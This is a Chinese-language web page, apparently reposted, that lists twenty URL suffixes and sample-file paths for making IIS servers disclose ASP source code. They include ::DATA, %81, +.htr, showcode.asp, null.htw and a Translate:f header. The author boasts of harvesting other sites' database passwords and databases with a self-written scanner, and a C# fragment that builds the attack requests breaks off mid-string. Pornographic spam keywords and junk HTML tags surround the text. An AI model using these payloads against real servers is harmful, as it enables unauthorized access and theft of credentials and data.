<track id="pdikh"><span id="pdikh"><em id="pdikh"></em></span></track>
<track id="pdikh"></track>

<bdo id="pdikh"></bdo><tbody id="pdikh"><nobr id="pdikh"><address id="pdikh"></address></nobr></tbody>
  • <bdo id="pdikh"></bdo>

    <menuitem id="pdikh"><dfn id="pdikh"></dfn></menuitem>

    <tbody id="pdikh"></tbody>
    1. 首頁 > 網站 > 幫助中心 > 正文

      教你如何查看ASP程序源碼20種方法

      2020-04-27 18:59:59
      字體:
      來源:轉載
      供稿:網友

        如何查看ASP程序源碼

      眾所周知windows平臺漏洞百出,補丁一個接一個,但總是補也補不凈。我把我所知道的20種看asp源碼的方法總結了一下,并且用c#寫了個應用程序 來掃描這些漏洞,發現雖然大部分的方法已經不起做用,但還是有一些漏網之魚的:),結果這兩天真看到不少站的源代碼,包括數據庫密碼,如果用access 的可以把庫下載下來,而用sql server的如果不是用udl,dsn等來連接的話,也可以通過tcp/ip網絡庫連接到數據庫,為所欲為呀。先面把這20種方法列在下面:

          .

          %81

          ::DATA

          %2e

          %2e%41sp

          +.htr

          //

          longhtr

          .bak

          codebrws.asp

          showcode.asp

          null.htw

          qfullhit.htw

          qsumrhit.htw

          query.idq

          search/qfullhit.htw

          search/qsumrhit.htw

          iirturnh.htw

          .htw

          Translate:f

          上邊這些漏洞前面10幾條是通過在asp文件后直接加上,如%81就是xxx.asp%81,后面這些都是通過iis自帶的例子或系統漏洞實現的,最特別的是那種translate:f方法,它直接通過瀏覽器是無法使用的,必須同服務器建立tcp/ip的socket連接,發送請求才行,具體每個漏洞如何使用,看下面,這是我那個應用程序的一部分,如果你要全部的可以到我的站點去下載。

          switch (this.cboMethod.SelectedIndex)

          {

          case 0: //直接讀取

          strRequestFile = strServer + strUrl ;

          break ;

          case 5 : //%2e%41sp

          strRequestFile = strServer + strPath + strFirst

          + "%2e%41sp" ;

          break ;

          case 8 : //longhtr

          strRequestFile = strServer + strUrl

          + "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"

          + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"

          + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

          + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

          + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"

          + "%20%20%20%20%20%20%20%20"


      (責任編輯:武林網)

      發表評論 共有條評論
      用戶名: 密碼:
      驗證碼: 匿名發表
      www con.co.三级免费视频不卡丨秋霞中文不卡无码午夜av影院丨丨吉沢明步高清无码电影免费一区二区丨japanese色国产在线观看
      <track id="pdikh"><span id="pdikh"><em id="pdikh"></em></span></track>
      <track id="pdikh"></track>

      <bdo id="pdikh"></bdo><tbody id="pdikh"><nobr id="pdikh"><address id="pdikh"></address></nobr></tbody>
    2. <bdo id="pdikh"></bdo>

      <menuitem id="pdikh"><dfn id="pdikh"></dfn></menuitem>

      <tbody id="pdikh"></tbody>